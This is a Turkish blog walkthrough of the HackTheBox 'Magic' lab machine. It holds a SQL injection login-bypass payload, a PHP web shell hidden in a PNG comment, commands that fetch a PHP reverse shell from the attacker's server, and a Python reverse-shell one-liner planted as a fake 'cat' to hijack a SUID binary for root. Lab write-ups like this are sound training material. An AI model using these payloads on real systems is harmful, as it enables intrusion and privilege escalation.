İçeriğe geç

Magic

Makine Adı Seviye OS Logo
Magic - HTB Orta Linux

Walkthrough

nmap taraması ile başlayalım.


PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 06:d4:89:bf:51:f7:fc:0c:f9:08:5e:97:63:64:8d:ca (RSA)
|   256 11:a6:92:98:ce:35:40:c7:29:09:4f:6c:2d:74:aa:66 (ECDSA)
|_  256 71:05:99:1f:a8:1b:14:d6:03:85:53:f8:78:8e:cb:88 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Magic Portfolio
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

index sayfasına gittiğimde bir login sayfası beniş karşıladı ve x' or 1=1 or 'x'='y payloadı ile sqli'dan yararlanıp giriş yaptım. Karşımda bir file upload sayfası vardı ve sadece png gibi uzantıları kabul edyor. Makinenin adından da Magic bytl'ları kullanmama gerektiğini biliyorum. Güzel ipucu.

Bir fotoğraf buldum internetten ve fotoğrafa yorum olarak web shell koyduym.

┌──(root💀kali)-[/home/kali/Desktop]
└─# exiftool -Comment='<?php system($_GET["cmd"]); ?>' a.png 
    1 image files updated

┌──(root💀kali)-[/home/kali/Desktop]
└─# mv a.png a.php.png

Küçük bir deneme yaptığımda
http://10.10.10.185/images/uploads/a.php.png?cmd=ls%20-al başarılı oldum. Sahip olduğum kullanıcı ile dosya yazma hakkımın olduğunu anlayınca php-reverse shell upload ettim.

http://10.10.10.185/images/uploads/a.php.png?cmd=wget%20http://10.10.14.12/php-reverse-shell.txt%20-o%20/tmp/php-reverse-shell.php
┌──(root💀kali)-[~/oscp/htb/Magic]
└─# python3 -m http.server 80                     
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.185 - - [12/Aug/2021 15:09:44] "GET /php-reverse-shell.txt HTTP/1.1" 200 -

http://10.10.10.185/images/uploads/php-reverse-shell.php sayfasına gittiğimde reverse elde ettim.


┌──(root💀kali)-[~/oscp/htb/Magic]
└─# nc -lvp 4444
listening on [any] 4444 ...
10.10.10.185: inverse host lookup failed: Unknown host
connect to [10.10.14.12] from (UNKNOWN) [10.10.10.185] 53980
Linux ubuntu 5.3.0-42-generic #34~18.04.1-Ubuntu SMP Fri Feb 28 13:42:26 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 12:14:02 up  1:05,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ 

İçeri girdikten sonra bir cred elde ettim ancak deneme yaptığımda başarılı olamadım.


$ pwd
/var/www/Magic
$ cat db.php5
<?php
class Database
{
    private static $dbName = 'Magic' ;
    private static $dbHost = 'localhost' ;
    private static $dbUsername = 'theseus';
    private static $dbUserPassword = 'iamkingtheseus';

    private static $cont  = null;

    public function __construct() {
        die('Init function is not allowed');
    }

    public static function connect()
    {
        // One connection through whole application
        if ( null == self::$cont )
        {
            try
            {
                self::$cont =  new PDO( "mysql:host=".self::$dbHost.";"."dbname=".self::$dbName, self::$dbUsername, self::$dbUserPassword);
            }
            catch(PDOException $e)
            {
                die($e->getMessage());
            }
        }
        return self::$cont;
    }

    public static function disconnect()
    {
        self::$cont = null;
    }
}

Bu arada /usr/bin/script -qc /bin/bash /dev/null ttl spawn için çok başarılı bulduğum bir komut dizisi...

Local portlarada baktığımızda mysql olduğunu anlayabiliyoruz.

[*] net000 Services listening only on localhost.........
................... yes!
---
tcp    LISTEN   0        5               127.0.0.1:631            0.0.0.0:*     
tcp    LISTEN   0        80              127.0.0.1:3306           0.0.0.0:*     
---

Ancak bir türlü mysql bağlantısı kuramadım. Bunun üzerine php kodu yazıp manuel denedim. Sonra bu scripti sunucuya attım ve yeni cred'ler elde ettim.

┌──(root💀kali)-[~/oscp/htb/Magic]
└─# cat testmysql.php             
<?php

 $dbName = 'Magic' ;
 $dbHost = 'localhost' ;
   $dbUsername = 'theseus';
  $dbUserPassword = 'iamkingtheseus';

$cont =  new PDO( "mysql:host=".$dbHost.";"."dbname=".$dbName, $dbUsername, $dbUserPassword);

 $stmt = $cont->query("SELECT * FROM login ");

 echo '<pre>'; print_r($stmt->fetch()); echo '</pre>';

 ?>

$ wget http://10.10.14.12/testmysql.php
--2021-08-13 02:47:19--  http://10.10.14.12/testmysql.php
Connecting to 10.10.14.12:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 338 [application/octet-stream]
Saving to: 'testmysql.php'

     0K                                                       100% 39.6M=0s

2021-08-13 02:47:19 (39.6 MB/s) - 'testmysql.php' saved [338/338]
┌──(root💀kali)-[~/oscp/htb/Magic]
└─# curl http://10.10.10.185/testmysql.php
<pre>Array
(
    [id] => 1
    [0] => 1
    [username] => admin
    [1] => admin
    [password] => Th3s3usW4sK1ng
    [2] => Th3s3usW4sK1ng
)
</pre>

Bu sefer başarılı oldum.

$ /usr/bin/script -qc /bin/bash /dev/null
www-data@ubuntu:/var/www/Magic$ ls /home
ls /home
theseus
www-data@ubuntu:/var/www/Magic$ su theseus
su theseus
Password: Th3s3usW4sK1ng

theseus@ubuntu:/var/www/Magic$ 

theseus@ubuntu:~$ cat user.txt
cat user.txt
3c2c70d62176dedf7d0933e5284f0b9c
theseus@ubuntu:~$ 

enum apmaya deva ederken /bin/sysinfo dosyasının suid bitinin aktif olduğunu gördüm.


theseus@ubuntu:/tmp$ strings /bin/sysinfo
/lib64/ld-linux-x86-64.so.2
libstdc++.so.6
__gmon_start__
_ITM_deregisterTMCloneTable
_ITM_registerTMCloneTable
_ZStlsIcSt11char_traitsIcESaIcEERSt13basic_ostreamIT_T0_ES7_RKNSt7__cxx1112basic_stringIS4_S5_T1_EE
_ZNSt13runtime_errorC1EPKc
_ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEpLEPKc
_ZNSt8ios_base4InitD1Ev
_ZNSolsEPFRSoS_E
__gxx_personality_v0
__cxa_allocate_exception
_ZSt4endlIcSt11char_traitsIcEERSt13basic_ostreamIT_T0_ES6_
_ZNSt8ios_base4InitC1Ev
_ZTISt13runtime_error
_ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEED1Ev
__cxa_throw
_ZNSt13runtime_errorD1Ev
_ZStlsISt11char_traitsIcEERSt13basic_ostreamIcT_ES5_PKc
__cxa_free_exception
_ZSt4cout
_ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEC1Ev
libgcc_s.so.1
_Unwind_Resume
libc.so.6
setuid
__stack_chk_fail
popen
fgets
__cxa_atexit
pclose
__cxa_finalize
setgid
__libc_start_main
GCC_3.0
CXXABI_1.3
GLIBCXX_3.4
GLIBCXX_3.4.21
GLIBC_2.4
GLIBC_2.2.5
%z! 
%r! 
%j! 
%b! 
%Z! 
%R! 
%J! 
%B! 
%:! 
%2! 
%*! 
=Q! 
=O  
ATSH
[A\]
ATSH
 [A\]
ATSH
 [A\]
AWAVI
AUATL
[]A\A]A^A_
popen() failed!
====================Hardware Info====================
lshw -short
====================Disk Info====================
fdisk -l
====================CPU Info====================
cat /proc/cpuinfo
====================MEM Usage=====================
free -h

Görüldüğü üzere kullandığı bir takım tool'lar var. Path'i manipüle ettim.


theseus@ubuntu:/tmp$ $PATH
-bash: /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin: No such file or directory
theseus@ubuntu:/tmp$ PATH=/tmp:$PATH

cat komutunu değiştirdim.


theseus@ubuntu:/tmp$ more cat
python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.12",1111));os.dup2(s.fileno(),0
);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'

theseus@ubuntu:/tmp$ chmod 777 cat

theseus@ubuntu:/tmp$ id
uid=1000(theseus) gid=1000(theseus) groups=1000(theseus),100(users)

Dinleme noktamı başlatıp /bin/sysinfo aracını çalıştırdım.


theseus@ubuntu:/tmp$ /bin/sysinfo
====================Hardware Info====================
H/W path           Device     Class      Description
====================================================
                              system     VMware Virtual Platform
/0                            bus        440BX Desktop Reference Platform
/0/0                          memory     86KiB BIOS
/0/1                          processor  AMD EPYC 7401P 24-Core Processor
/0/1/0                        memory     16KiB L1 cache
/0/1/1                        memory     16KiB L1 cache
/0/1/2                        memory     512KiB L2 cache
/0/1/3                        memory     512KiB L2 cache
/0/2                          processor  AMD EPYC 7401P 24-Core Processor
/0/28                         memory     System Memory
/0/28/0                       memory     4GiB DIMM DRAM EDO
/0/28/1                       memory     DIMM DRAM [empty]
/0/28/2                       memory     DIMM DRAM [empty]
/0/28/3                       memory     DIMM DRAM [empty]
/0/28/4                       memory     DIMM DRAM [empty]
/0/28/5                       memory     DIMM DRAM [empty]
/0/28/6                       memory     DIMM DRAM [empty]
/0/28/7                       memory     DIMM DRAM [empty]
/0/28/8                       memory     DIMM DRAM [empty]
/0/28/9                       memory     DIMM DRAM [empty]
/0/28/a                       memory     DIMM DRAM [empty]
/0/28/b                       memory     DIMM DRAM [empty]
/0/28/c                       memory     DIMM DRAM [empty]
/0/28/d                       memory     DIMM DRAM [empty]
/0/28/e                       memory     DIMM DRAM [empty]
/0/28/f                       memory     DIMM DRAM [empty]
/0/28/10                      memory     DIMM DRAM [empty]
/0/28/11                      memory     DIMM DRAM [empty]
/0/28/12                      memory     DIMM DRAM [empty]
/0/28/13                      memory     DIMM DRAM [empty]
/0/28/14                      memory     DIMM DRAM [empty]
/0/28/15                      memory     DIMM DRAM [empty]
/0/28/16                      memory     DIMM DRAM [empty]
/0/28/17                      memory     DIMM DRAM [empty]
/0/28/18                      memory     DIMM DRAM [empty]
/0/28/19                      memory     DIMM DRAM [empty]
/0/28/1a                      memory     DIMM DRAM [empty]
/0/28/1b                      memory     DIMM DRAM [empty]
/0/28/1c                      memory     DIMM DRAM [empty]
/0/28/1d                      memory     DIMM DRAM [empty]
/0/28/1e                      memory     DIMM DRAM [empty]
/0/28/1f                      memory     DIMM DRAM [empty]
/0/28/20                      memory     DIMM DRAM [empty]
/0/28/21                      memory     DIMM DRAM [empty]
/0/28/22                      memory     DIMM DRAM [empty]
/0/28/23                      memory     DIMM DRAM [empty]
/0/28/24                      memory     DIMM DRAM [empty]
/0/28/25                      memory     DIMM DRAM [empty]
/0/28/26                      memory     DIMM DRAM [empty]
/0/28/27                      memory     DIMM DRAM [empty]
/0/28/28                      memory     DIMM DRAM [empty]
/0/28/29                      memory     DIMM DRAM [empty]
/0/28/2a                      memory     DIMM DRAM [empty]
/0/28/2b                      memory     DIMM DRAM [empty]
/0/28/2c                      memory     DIMM DRAM [empty]
/0/28/2d                      memory     DIMM DRAM [empty]
/0/28/2e                      memory     DIMM DRAM [empty]
/0/28/2f                      memory     DIMM DRAM [empty]
/0/28/30                      memory     DIMM DRAM [empty]
/0/28/31                      memory     DIMM DRAM [empty]
/0/28/32                      memory     DIMM DRAM [empty]
/0/28/33                      memory     DIMM DRAM [empty]
/0/28/34                      memory     DIMM DRAM [empty]
/0/28/35                      memory     DIMM DRAM [empty]
/0/28/36                      memory     DIMM DRAM [empty]
/0/28/37                      memory     DIMM DRAM [empty]
/0/28/38                      memory     DIMM DRAM [empty]
/0/28/39                      memory     DIMM DRAM [empty]
/0/28/3a                      memory     DIMM DRAM [empty]
/0/28/3b                      memory     DIMM DRAM [empty]
/0/28/3c                      memory     DIMM DRAM [empty]
/0/28/3d                      memory     DIMM DRAM [empty]
/0/28/3e                      memory     DIMM DRAM [empty]
/0/28/3f                      memory     DIMM DRAM [empty]
/0/3                          memory     
/0/3/0                        memory     DIMM [empty]
/0/4                          memory     
/0/4/0                        memory     DIMM [empty]
/0/5                          memory     
/0/5/0                        memory     DIMM [empty]
/0/6                          memory     
/0/6/0                        memory     DIMM [empty]
/0/7                          memory     
/0/7/0                        memory     DIMM [empty]
/0/8                          memory     
/0/8/0                        memory     DIMM [empty]
/0/9                          memory     
/0/9/0                        memory     DIMM [empty]
/0/a                          memory     
/0/a/0                        memory     DIMM [empty]
/0/b                          memory     
/0/b/0                        memory     DIMM [empty]
/0/c                          memory     
/0/c/0                        memory     DIMM [empty]
/0/d                          memory     
/0/d/0                        memory     DIMM [empty]
/0/e                          memory     
/0/e/0                        memory     DIMM [empty]
/0/f                          memory     
/0/f/0                        memory     DIMM [empty]
/0/10                         memory     
/0/10/0                       memory     DIMM [empty]
/0/11                         memory     
/0/11/0                       memory     DIMM [empty]
/0/12                         memory     
/0/12/0                       memory     DIMM [empty]
/0/13                         memory     
/0/13/0                       memory     DIMM [empty]
/0/14                         memory     
/0/14/0                       memory     DIMM [empty]
/0/15                         memory     
/0/15/0                       memory     DIMM [empty]
/0/16                         memory     
/0/16/0                       memory     DIMM [empty]
/0/17                         memory     
/0/17/0                       memory     DIMM [empty]
/0/18                         memory     
/0/18/0                       memory     DIMM [empty]
/0/19                         memory     
/0/19/0                       memory     DIMM [empty]
/0/1a                         memory     
/0/1a/0                       memory     DIMM [empty]
/0/1b                         memory     
/0/1b/0                       memory     DIMM [empty]
/0/1c                         memory     
/0/1c/0                       memory     DIMM [empty]
/0/1d                         memory     
/0/1d/0                       memory     DIMM [empty]
/0/1e                         memory     
/0/1e/0                       memory     DIMM [empty]
/0/1f                         memory     
/0/1f/0                       memory     DIMM [empty]
/0/20                         memory     
/0/20/0                       memory     DIMM [empty]
/0/21                         memory     
/0/21/0                       memory     DIMM [empty]
/0/22                         memory     
/0/22/0                       memory     DIMM [empty]
/0/23                         memory     
/0/23/0                       memory     DIMM [empty]
/0/24                         memory     
/0/24/0                       memory     DIMM [empty]
/0/25                         memory     
/0/25/0                       memory     DIMM [empty]
/0/26                         memory     
/0/26/0                       memory     DIMM [empty]
/0/27                         memory     
/0/27/0                       memory     DIMM [empty]
/0/29                         memory     
/0/29/0                       memory     DIMM [empty]
/0/2a                         memory     
/0/2a/0                       memory     DIMM [empty]
/0/2b                         memory     
/0/2b/0                       memory     DIMM [empty]
/0/2c                         memory     
/0/2c/0                       memory     DIMM [empty]
/0/2d                         memory     
/0/2d/0                       memory     DIMM [empty]
/0/2e                         memory     
/0/2e/0                       memory     DIMM [empty]
/0/2f                         memory     
/0/2f/0                       memory     DIMM [empty]
/0/30                         memory     
/0/30/0                       memory     DIMM [empty]
/0/31                         memory     
/0/31/0                       memory     DIMM [empty]
/0/32                         memory     
/0/32/0                       memory     DIMM [empty]
/0/33                         memory     
/0/33/0                       memory     DIMM [empty]
/0/34                         memory     
/0/34/0                       memory     DIMM [empty]
/0/35                         memory     
/0/35/0                       memory     DIMM [empty]
/0/36                         memory     
/0/36/0                       memory     DIMM [empty]
/0/37                         memory     
/0/37/0                       memory     DIMM [empty]
/0/38                         memory     
/0/38/0                       memory     DIMM [empty]
/0/39                         memory     
/0/39/0                       memory     DIMM [empty]
/0/3a                         memory     
/0/3a/0                       memory     DIMM [empty]
/0/3b                         memory     
/0/3b/0                       memory     DIMM [empty]
/0/3c                         memory     
/0/3c/0                       memory     DIMM [empty]
/0/3d                         memory     
/0/3d/0                       memory     DIMM [empty]
/0/3e                         memory     
/0/3e/0                       memory     DIMM [empty]
/0/3f                         memory     
/0/3f/0                       memory     DIMM [empty]
/0/40                         memory     
/0/40/0                       memory     DIMM [empty]
/0/41                         memory     
/0/41/0                       memory     DIMM [empty]
/0/42                         memory     
/0/42/0                       memory     DIMM [empty]
/0/43                         memory     
/0/43/0                       memory     DIMM [empty]
/0/44                         memory     
/0/45                         memory     
/0/100                        bridge     440BX/ZX/DX - 82443BX/ZX/DX Host bridge
/0/100/1                      bridge     440BX/ZX/DX - 82443BX/ZX/DX AGP bridge
/0/100/7                      bridge     82371AB/EB/MB PIIX4 ISA
/0/100/7.1                    storage    82371AB/EB/MB PIIX4 IDE
/0/100/7.3                    bridge     82371AB/EB/MB PIIX4 ACPI
/0/100/7.7                    generic    Virtual Machine Communication Interface
/0/100/f                      display    SVGA II Adapter
/0/100/10          scsi32     storage    53c1030 PCI-X Fusion-MPT Dual Ultra320 SCSI
/0/100/10/0.1.0    /dev/sda   disk       10GB Virtual disk
/0/100/10/0.1.0/1  /dev/sda1  volume     9214MiB EXT4 volume
/0/100/10/0.1.0/2  /dev/sda2  volume     1025MiB Linux swap volume
/0/100/11                     bridge     PCI bridge
/0/100/11/0                   bus        USB1.1 UHCI Controller
/0/100/11/0/1      usb2       bus        UHCI Host Controller
/0/100/11/0/1/1               input      VMware Virtual USB Mouse
/0/100/11/0/1/2               bus        VMware Virtual USB Hub
/0/100/11/1                   bus        USB2 EHCI Controller
/0/100/11/1/1      usb1       bus        EHCI Host Controller
/0/100/11/2                   storage    SATA AHCI controller
/0/100/15                     bridge     PCI Express Root Port
/0/100/15/0        ens160     network    VMXNET3 Ethernet Controller
/0/100/15.1                   bridge     PCI Express Root Port
/0/100/15.2                   bridge     PCI Express Root Port
/0/100/15.3                   bridge     PCI Express Root Port
/0/100/15.4                   bridge     PCI Express Root Port
/0/100/15.5                   bridge     PCI Express Root Port
/0/100/15.6                   bridge     PCI Express Root Port
/0/100/15.7                   bridge     PCI Express Root Port
/0/100/16                     bridge     PCI Express Root Port
/0/100/16.1                   bridge     PCI Express Root Port
/0/100/16.2                   bridge     PCI Express Root Port
/0/100/16.3                   bridge     PCI Express Root Port
/0/100/16.4                   bridge     PCI Express Root Port
/0/100/16.5                   bridge     PCI Express Root Port
/0/100/16.6                   bridge     PCI Express Root Port
/0/100/16.7                   bridge     PCI Express Root Port
/0/100/17                     bridge     PCI Express Root Port
/0/100/17.1                   bridge     PCI Express Root Port
/0/100/17.2                   bridge     PCI Express Root Port
/0/100/17.3                   bridge     PCI Express Root Port
/0/100/17.4                   bridge     PCI Express Root Port
/0/100/17.5                   bridge     PCI Express Root Port
/0/100/17.6                   bridge     PCI Express Root Port
/0/100/17.7                   bridge     PCI Express Root Port
/0/100/18                     bridge     PCI Express Root Port
/0/100/18.1                   bridge     PCI Express Root Port
/0/100/18.2                   bridge     PCI Express Root Port
/0/100/18.3                   bridge     PCI Express Root Port
/0/100/18.4                   bridge     PCI Express Root Port
/0/100/18.5                   bridge     PCI Express Root Port
/0/100/18.6                   bridge     PCI Express Root Port
/0/100/18.7                   bridge     PCI Express Root Port
/1                            system     

====================Disk Info====================
Disk /dev/loop0: 164.8 MiB, 172761088 bytes, 337424 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes

Disk /dev/loop1: 65.1 MiB, 68259840 bytes, 133320 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes

Disk /dev/loop2: 243.9 MiB, 255762432 bytes, 499536 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes

Disk /dev/loop3: 956 KiB, 978944 bytes, 1912 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes

Disk /dev/loop4: 44.9 MiB, 47063040 bytes, 91920 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes

Disk /dev/loop5: 2.5 MiB, 2621440 bytes, 5120 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes

Disk /dev/loop6: 548 KiB, 561152 bytes, 1096 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes

Disk /dev/loop7: 219 MiB, 229638144 bytes, 448512 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes

Disk /dev/sda: 10 GiB, 10737418240 bytes, 20971520 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0xf8b0a793

Device     Boot    Start      End  Sectors Size Id Type
/dev/sda1           2048 18872319 18870272   9G 83 Linux
/dev/sda2       18872320 20971519  2099200   1G 82 Linux swap / Solaris

Disk /dev/loop8: 160.2 MiB, 167931904 bytes, 327992 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes

Disk /dev/loop9: 61.7 MiB, 64729088 bytes, 126424 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes

Disk /dev/loop10: 3.7 MiB, 3862528 bytes, 7544 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes

Disk /dev/loop11: 91.4 MiB, 95805440 bytes, 187120 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes

Disk /dev/loop12: 99.4 MiB, 104202240 bytes, 203520 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes

Disk /dev/loop13: 54.7 MiB, 57294848 bytes, 111904 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes

Disk /dev/loop14: 55.5 MiB, 58134528 bytes, 113544 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes

====================CPU Info====================

┌──(root💀kali)-[~/oscp/htb/Magic]
└─# nc -lvp 1111
listening on [any] 1111 ...
10.10.10.185: inverse host lookup failed: Unknown host
connect to [10.10.14.12] from (UNKNOWN) [10.10.10.185] 58062
# id
id
uid=0(root) gid=0(root) groups=0(root),100(users),1000(theseus)
# cd /root
cd /root
# ls
ls
info.c  root.txt  snap
# cat root.txt 
cat root.txt
Traceback (most recent call last):
  File "<string>", line 1, in <module>
ConnectionRefusedError: [Errno 111] Connection refused
# more root.txt
more root.txt
460fc11a0bec04f180622febe662970c
Kategori:SQLWalkthrough

İlk Yorumu Siz Yapın

Bir yanıt yazın

E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir